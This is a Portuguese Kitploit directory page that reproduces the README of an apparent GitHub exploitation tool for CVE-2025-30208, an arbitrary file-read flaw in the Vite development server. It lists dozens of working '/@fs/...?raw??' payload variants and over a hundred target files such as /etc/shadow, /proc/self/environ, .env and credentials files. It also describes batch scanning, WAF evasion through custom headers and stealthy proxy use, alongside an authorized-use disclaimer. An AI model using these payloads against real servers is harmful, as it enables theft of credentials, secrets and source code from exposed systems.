Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 é uma vulnerabilidade de leitura arbitrária de arquivos de gravidade média no servidor de desenvolvimento Vite (uma popular ferramenta de construção frontend) | Kitploit
Ferramentas/GitHubGitHub/themehackers/cve-2025-30208
Scanners de VulnerabilidadesGeração de PayloadsExploraçãoColeta de InformaçõesSegurança WebTestes de Penetração
GitHubthemehackers/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 é uma vulnerabilidade de leitura arbitrária de arquivos de gravidade média no servidor de desenvolvimento Vite (uma popular ferramenta de construção frontend)

Ver Repositório
10há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🔥 Scanner de Vulnerabilidade de Leitura Arbitrária de Arquivos CVE-2025-30208 do Vite

Python License Security Status Modular

Scanner de vulnerabilidade avançado para CVE-2025-30208 com recursos de nível empresarial

Ferramenta profissional de teste de penetração para detecção de vulnerabilidade de leitura arbitrária de arquivos do Vite

🚀 Início Rápido • 📋 Recursos • 🔧 Uso • 📊 Exemplos • 🛡️ Segurança


📖 Visão Geral

Este é um scanner de vulnerabilidade abrangente projetado para detectar e explorar a vulnerabilidade CVE-2025-30208 em servidores de desenvolvimento Vite. A vulnerabilidade permite acesso de leitura arbitrária de arquivos através dos endpoints do sistema de arquivos do Vite, potencialmente expondo arquivos de configuração sensíveis, código-fonte e informações do sistema.

🎯 O Que Esta Ferramenta Faz

  • Detecta instâncias vulneráveis do Vite em redes
  • Explora a vulnerabilidade de leitura arbitrária de arquivos com segurança
  • Descobre arquivos sensíveis e dados de configuração
  • Relata descobertas em múltiplos formatos (HTML, JSON, Console)
  • Gerencia sessões de varredura e configurações
  • Lida com erros graciosamente com mecanismos automáticos de repetição

🏗️ Arquitetura Modular

A ferramenta agora possui uma arquitetura modular para melhor manutenibilidade e extensibilidade:

  • CVE-2025-30208.py - Aplicação principal do scanner
  • payloads.py - Payloads de exploração avançados (mais de 60 variações)
  • sensitive_files.py - Banco de dados abrangente de arquivos sensíveis (mais de 200 arquivos)
  • html_template.py - Template aprimorado de relatório HTML no estilo hacker

🚀 Início Rápido

Pré-requisitos

root@kitploit:~
pip3 install -r requirements.txt

Uso Básico

root@kitploit:~
python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Recursos

🔍 Detecção de Vulnerabilidade Principal

  • Mais de 60 Payloads Avançados: Técnicas de exploração abrangentes para detecção máxima
  • Detecção Inteligente: Análise inteligente de respostas para evitar falsos positivos
  • Validação em Tempo Real: Validação contínua das respostas do alvo
  • Teste Abrangente: Testa todos os endpoints vulneráveis conhecidos

🛡️ Recursos de Segurança Aprimorados

  • Suporte a Proxy: Configuração de proxy HTTP/HTTPS para anonimato
  • Cabeçalhos Personalizados: Bypass de WAF/IPS com cabeçalhos HTTP personalizados
  • Limitação de Taxa: Atrasos configuráveis para evitar detecção
  • Gerenciamento de Sessão: Salvar e restaurar sessões de varredura
  • Validação de Entrada: Validação abrangente de parâmetros

🔧 Capacidades Avançadas

  • Varredura em Lote: Varredura multi-thread de múltiplos alvos
  • Descoberta de Arquivos Sensíveis: Descoberta automatizada de mais de 200 arquivos sensíveis
  • Teste de Conectividade: Teste de protocolos TCP/UDP/HTTP/HTTPS
  • Recuperação de Erros: Repetição automática com backoff exponencial
  • Registro Abrangente: Logs detalhados com timestamps

📊 Relatórios e Saída

  • 🎨 Relatórios HTML Aprimorados: Belos relatórios de vulnerabilidade no estilo hacker com animações
  • Exportação JSON: Dados estruturados para análise posterior
  • Saída no Console: Feedback em tempo real com código de cores
  • Arquivos de Log: Trilhas de auditoria detalhadas
  • Interface Web Interativa: Servidor web embutido para visualização de relatórios

🔧 Guia de Uso

1. Configuração Básica

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Teste de Vulnerabilidade

root@kitploit:~
CVE-2025-30208 > run

# Habilitar modo verboso para saída detalhada
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Varredura em Lote

root@kitploit:~
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Pressione Enter duas vezes para finalizar]

4. Descoberta de Arquivos Sensíveis

root@kitploit:~
CVE-2025-30208 > scan

5. Configuração Avançada

root@kitploit:~
# Configurar proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Definir cabeçalhos personalizados
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configurar limitação de taxa
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Relatório HTML Aprimorado

root@kitploit:~
# Gerar belo relatório HTML
CVE-2025-30208 > pull

# Iniciar servidor web para visualizar relatório
CVE-2025-30208 > web

# Iniciar servidor web em porta específica
CVE-2025-30208 > web 8081

# Parar servidor web
CVE-2025-30208 > web off

📊 Referência de Comandos


⚙️ Opções de Configuração


🎨 Sistema de Payload Aprimorado

O scanner agora usa mais de 60 variações de payload organizadas em payloads.py:

Payloads @fs Principais

root@kitploit:~
/@fs/{caminho_arquivo}?raw??
/@fs/{caminho_arquivo}?raw&url
/@fs/{caminho_arquivo}?import&raw??
/@fs/{caminho_arquivo}?raw&import
/@fs/{caminho_arquivo}?import&url

Variações Estendidas de Parâmetros

root@kitploit:~
/@fs/{caminho_arquivo}?raw&source
/@fs/{caminho_arquivo}?raw&content
/@fs/{caminho_arquivo}?raw&data
/@fs/{caminho_arquivo}?raw&file
/@fs/{caminho_arquivo}?raw&type=text
/@fs/{caminho_arquivo}?raw&format=text
/@fs/{caminho_arquivo}?raw&encoding=utf8

Variações Específicas do Vite

root@kitploit:~
/@fs/{caminho_arquivo}?raw&vite&dev
/@fs/{caminho_arquivo}?raw&vite&hot
/@fs/{caminho_arquivo}?raw&vite&hmr
/@fs/{caminho_arquivo}?raw&development
/@fs/{caminho_arquivo}?raw&debug

Variações do Sistema de Módulos

root@kitploit:~
/@fs/{caminho_arquivo}?raw&esm
/@fs/{caminho_arquivo}?raw&cjs
/@fs/{caminho_arquivo}?raw&umd
/@fs/{caminho_arquivo}?raw&js
/@fs/{caminho_arquivo}?raw&ts
/@fs/{caminho_arquivo}?raw&json
/@fs/{caminho_arquivo}?raw&css
/@fs/{caminho_arquivo}?raw&html

Endpoints Alternativos

root@kitploit:~
/app/{caminho_arquivo}?raw??
/App/{caminho_arquivo}?raw??

🔍 Descoberta Aprimorada de Arquivos Sensíveis

A ferramenta agora testa mais de 200 arquivos sensíveis organizados em sensitive_files.py:

🖥️ Arquivos de Sistema (Linux/Unix)

  • /etc/passwd - Informações da conta de usuário
  • /etc/shadow - Dados de senha criptografados
  • /etc/services - Serviços de rede
  • /etc/hosts - Mapeamentos de nomes de host
  • /etc/fstab - Tabela do sistema de arquivos
  • /etc/ssh/sshd_config - Configuração do servidor SSH
  • /etc/crontab - Trabalhos cron do sistema
  • /etc/sudoers - Configuração do sudo

📊 Informações de Processo

  • /proc/version - Versão do kernel
  • /proc/cpuinfo - Informações da CPU
  • /proc/meminfo - Informações da memória
  • /proc/self/environ - Ambiente do processo
  • /proc/self/cmdline - Linha de comando do processo
  • /proc/net/tcp - Conexões TCP
  • /proc/net/udp - Conexões UDP

⚙️ Configuração de Aplicação

  • .env - Variáveis de ambiente
  • .env.local - Ambiente local
  • .env.production - Ambiente de produção
  • config.json - Configuração da aplicação
  • settings.json - Definições da aplicação
  • application.properties - Configuração Spring
  • application.yml - Configuração YAML
  • database.yml - Configuração do banco de dados
  • secrets.json - Gerenciamento de segredos

📦 Arquivos Node.js / JavaScript

  • package.json - Dependências Node.js
  • package-lock.json - Dependências bloqueadas
  • yarn.lock - Arquivo de bloqueio Yarn
  • vite.config.js - Configuração Vite
  • vite.config.ts - Configuração Vite TypeScript
  • tsconfig.json - Configuração TypeScript
  • webpack.config.js - Configuração Webpack
  • next.config.js - Configuração Next.js
  • nuxt.config.js - Configuração Nuxt.js
  • angular.json - Configuração Angular
  • vue.config.js - Configuração Vue.js
  • rollup.config.js - Configuração Rollup
  • eslint.config.js - Configuração ESLint

🔧 Arquivos Git

  • .git/config - Configuração Git
  • .gitignore - Regras de ignorar Git
  • .gitattributes - Atributos Git
  • .gitmodules - Submódulos Git
  • .git/HEAD - Branch atual
  • .git/logs/HEAD - Logs Git
  • .git/refs/heads/master - Branch master
  • .git/refs/heads/main - Branch main

📚 Arquivos de Documentação

  • README.md - Documentação do projeto
  • CHANGELOG.md - Registro de alterações
  • LICENSE - Informações de licença
  • CONTRIBUTING.md - Diretrizes de contribuição
  • AUTHORS - Informações do autor
  • TODO.md - Lista de tarefas
  • ROADMAP.md - Roteiro de desenvolvimento

🐳 Arquivos Docker

  • Dockerfile - Configuração Docker
  • docker-compose.yml - Docker Compose
  • docker-compose.override.yml - Configuração de sobreposição
  • .dockerignore - Regras de ignorar Docker
  • docker-compose.prod.yml - Configuração de produção
  • docker-compose.dev.yml - Configuração de desenvolvimento

🌐 Configuração de Servidor Web

  • nginx.conf - Configuração Nginx
  • apache2.conf - Configuração Apache
  • httpd.conf - Configuração do daemon HTTP
  • .htaccess - Controle de acesso Apache
  • web.config - Configuração IIS
  • robots.txt - Diretivas para motores de busca
  • sitemap.xml - Estrutura do site
  • manifest.json - Manifesto do aplicativo web
  • sw.js - Service worker
  • firebase.json - Configuração Firebase
  • firebase.rules - Regras de segurança Firebase

🪟 Arquivos Windows

  • boot.ini - Configuração de inicialização
  • autoexec.bat - Script de execução automática
  • system.ini - Configuração do sistema
  • win.ini - Configuração do Windows
  • Users - Diretórios de usuários
  • Windows - Arquivos do sistema
  • Program Files - Diretórios de aplicativos

🍎 Arquivos macOS

  • System - Arquivos do sistema
  • Library - Arquivos de biblioteca
  • Applications - Arquivos de aplicativos
  • private/etc/hosts - Arquivo hosts
  • private/etc/passwd - Contas de usuário

🗄️ Arquivos de Banco de Dados

  • database.db - Banco de dados SQLite
  • database.sqlite - Banco de dados SQLite
  • data.db - Banco de dados de dados
  • dump.sql - Despejo de banco de dados
  • schema.sql - Esquema do banco de dados
  • migrations - Migrações de banco de dados

📝 Arquivos de Log

  • logs - Diretório de logs
  • error.log - Logs de erro
  • access.log - Logs de acesso
  • app.log - Logs da aplicação
  • debug.log - Logs de depuração
  • combined.log - Logs combinados

💾 Arquivos de Backup

  • backup - Diretório de backup
  • backup.sql - Backup de banco de dados
  • backup.zip - Backup compactado
  • dump - Despejo de dados
  • export - Exportação de dados

🔒 Segurança e Autenticação

  • auth.json - Configuração de autenticação
  • credentials.json - Armazenamento de credenciais
  • keys.json - Gerenciamento de chaves
  • tokens.json - Armazenamento de tokens
  • jwt.json - Configuração JWT
  • oauth.json - Configuração OAuth

🔌 Arquivos de API e Serviço

  • api.json - Configuração de API
  • swagger.json - Documentação da API
  • openapi.json - Especificação OpenAPI
  • graphql.json - Configuração GraphQL
  • schema.json - Esquema da API

☁️ Arquivos de Nuvem e Implantação

  • cloudformation.yml - AWS CloudFormation
  • serverless.yml - Configuração Serverless
  • terraform.tf - Configuração Terraform
  • kubernetes.yml - Configuração Kubernetes
  • k8s.yml - Configuração Kubernetes

📊 Monitoramento e Análise

  • analytics.json - Configuração de análise
  • monitoring.json - Configuração de monitoramento
  • metrics.json - Configuração de métricas
  • telemetry.json - Dados de telemetria

🎨 Relatório HTML Aprimorado

A ferramenta agora gera belos relatórios HTML no estilo hacker com:

✨ Recursos Visuais

  • Fundo estilo Matrix com caracteres em queda animados
  • Animações gradientes e efeitos brilhantes
  • Elementos interativos com efeitos de hover
  • Design responsivo para todos os dispositivos
  • Tema escuro otimizado para profissionais de segurança

📊 Estatísticas Interativas

  • Contadores em tempo real para vazamentos totais e bytes expostos
  • Indicadores de severidade com código de cores
  • Funcionalidade de cópia para cada vazamento
  • Visualização de conteúdo com tamanho e contagem de linhas
  • Seções expansíveis para análise detalhada

🔧 Recursos Técnicos

  • Integração com Google Fonts (JetBrains Mono, Orbitron)
  • Animações CSS e transições
  • Interatividade JavaScript para UX aprimorada
  • Design responsivo para dispositivos móveis
  • Compatibilidade entre navegadores

🌐 Integração com Servidor Web

  • Servidor HTTP embutido para visualização de relatórios
  • Abertura automática do navegador
  • Opções de configuração de porta
  • Comandos fáceis de iniciar/parar

🛡️ Tratamento e Recuperação de Erros

Mecanismo Automático de Repetição

  • 3 Tentativas de Repetição: Requisições com falha são repetidas automaticamente
  • Backoff Exponencial: Atrasos crescentes entre as repetições
  • Classificação Inteligente de Erros: Tratamento diferente para diferentes tipos de erro
  • Recuperação Graciosa: A ferramenta continua operando após erros

Categorias de Erro

  • NetworkError: Problemas de conexão, timeout, proxy
  • ConfigurationError: Definições e parâmetros inválidos
  • ValidationError: Parâmetros de entrada inválidos
  • ScannerError: Erros gerais do scanner

Recursos de Validação

  • Validação de Entrada em Tempo Real: Todos os parâmetros validados antes do uso
  • Validação de Configuração: Validação completa antes da varredura
  • Teste de Conectividade: Teste de protocolos TCP/UDP/HTTP/HTTPS
  • Validação de Proxy: Validação do formato da URL do proxy

📁 Arquivos de Saída


📝 Versões Afetadas

🚨 Versões Vulneráveis

root@kitploit:~
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9

✅ Versões Não Afetadas

root@kitploit:~
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0

🛡️ Segurança e Uso Ético

⚠️ Notas Importantes de Segurança

  • Teste Autorizado Apenas: Use apenas em sistemas que você possui ou tem permissão explícita para testar
  • Divulgação Responsável: Relate vulnerabilidades aos proprietários do sistema
  • Limitação de Taxa: Use atrasos apropriados para evitar sobrecarregar os alvos
  • Uso de Proxy: Considere usar proxies para anonimato quando apropriado
  • Conformidade Legal: Garanta conformidade com leis e regulamentos locais

🔒 Melhores Práticas

  • Sempre obtenha permissão por escrito antes de testar
  • Use apenas em ambientes controlados
  • Documente todas as atividades de teste
  • Respeite limites de taxa e recursos do sistema
  • Relate descobertas de forma responsável

🚀 Exemplos de Uso Avançado

Exemplo 1: Varredura de Rede Abrangente

root@kitploit:~
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch

Exemplo 2: Varredura Furtiva com Proxy

root@kitploit:~
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run

Exemplo 3: Fluxo de Trabalho Aprimorado de Relatórios

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080

Exemplo 4: Descoberta de Arquivos Sensíveis

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan

🏗️ Estrutura do Projeto

root@kitploit:~
CVE-2025-30208/
├── CVE-2025-30208.py          # Aplicação principal do scanner
├── payloads.py                # Payloads de exploração avançados (mais de 60)
├── sensitive_files.py         # Banco de dados de arquivos sensíveis (mais de 200)
├── html_template.py           # Template de relatório HTML aprimorado
├── README.md                  # Esta documentação
├── requirements.txt           # Dependências Python
├── logs/                      # Diretório de arquivos de log
├── data_leak.html            # Relatórios HTML gerados
├── data_leak.json            # Relatórios JSON gerados
└── session.json              # Configurações de sessão salvas

🤝 Contribuindo

Recebemos contribuições para melhorar esta ferramenta:

  1. Faça um Fork do repositório
  2. Crie um branch de funcionalidade
  3. Faça suas alterações
  4. Teste completamente
  5. Envie um pull request

Áreas de Contribuição

  • Novas variações de payload em payloads.py
  • Padrões adicionais de arquivos sensíveis em sensitive_files.py
  • Templates HTML aprimorados em html_template.py
  • Melhor tratamento de erros
  • Otimizações de desempenho
  • Melhorias na documentação

📄 Licença

Este projeto está licenciado para propósitos educacionais e de teste de segurança autorizados apenas.

⚠️ Aviso Legal: Esta ferramenta é destinada apenas para testes de segurança autorizados e fins de pesquisa. Os usuários são responsáveis por garantir que possuem autorização adequada antes de testar qualquer sistema. Os autores não são responsáveis por qualquer uso indevido desta ferramenta.


👨‍💻 Autor

ThemeHackers

GitHub

Pesquisador de Segurança e Testador de Penetração


⭐ Se esta ferramenta ajudou você, dê uma estrela! ⭐

Construído com ❤️ para a comunidade de segurança

Baixar ferramenta
ComandoDescriçãoExemplo
set <opção> <valor>Definir opções de configuraçãoset RHOST 192.168.1.100
show optionsExibir configurações atuaisshow options
editEditor interativo de opçõesedit
run / exploitExecutar teste de vulnerabilidaderun
batchVarredura em lote de múltiplos alvosbatch
scanDescobrir arquivos sensíveisscan
pullExportar resultados para HTML/JSONpull
web [on|off|porta]Servidor web para relatórios HTMLweb 8080
saveSalvar configuração da sessãosave
loadCarregar configuração da sessãoload
testTestar conectividade com o alvotest
validateValidar configuração atualvalidate
verboseAlternar modo verbosoverbose
proxyConfigurar definições de proxyproxy
headersDefinir cabeçalhos HTTP personalizadosheaders
rateConfigurar limitação de taxarate
logMostrar informações de loglog
help / ?Mostrar ajudahelp
exit / quitSair da ferramentaexit
OpçãoDescriçãoPadrãoValidação
RHOSTHost/IP alvo-Validação de hostname/IP
RPORTNúmero da porta alvo-Faixa de porta (1-65535)
FILEPATHCaminho do arquivo a testaretc/passwdValidação de caminho
PROXYURL do proxy HTTP/HTTPS-Validação de formato de URL
VERBOSEHabilitar saída verbosafalseValidação booleana
RATE_LIMITAtraso entre requisições (segundos)0.3Validação numérica
THREADSNúmero de threads para varredura em lote5Validação de inteiro
TIMEOUTTimeout da requisição (segundos)5Validação de inteiro
CUSTOM_HEADERSCabeçalhos HTTP personalizados (JSON){}Validação de formato JSON
  • prettier.config.js - Configuração Prettier
  • jest.config.js - Configuração Jest
  • babel.config.js - Configuração Babel
  • tailwind.config.js - Configuração Tailwind CSS
  • ArquivoDescriçãoFormato
    data_leak.htmlRelatório de vulnerabilidade HTML aprimorado no estilo hackerHTML
    data_leak.jsonExportação JSON estruturadaJSON
    sensitive_files_discovery.jsonArquivos sensíveis descobertosJSON
    session.jsonConfiguração de sessão salvaJSON
    logs/cve_2025_30208_AAAAMMDD_HHMMSS.logLogs de auditoria detalhadosTexto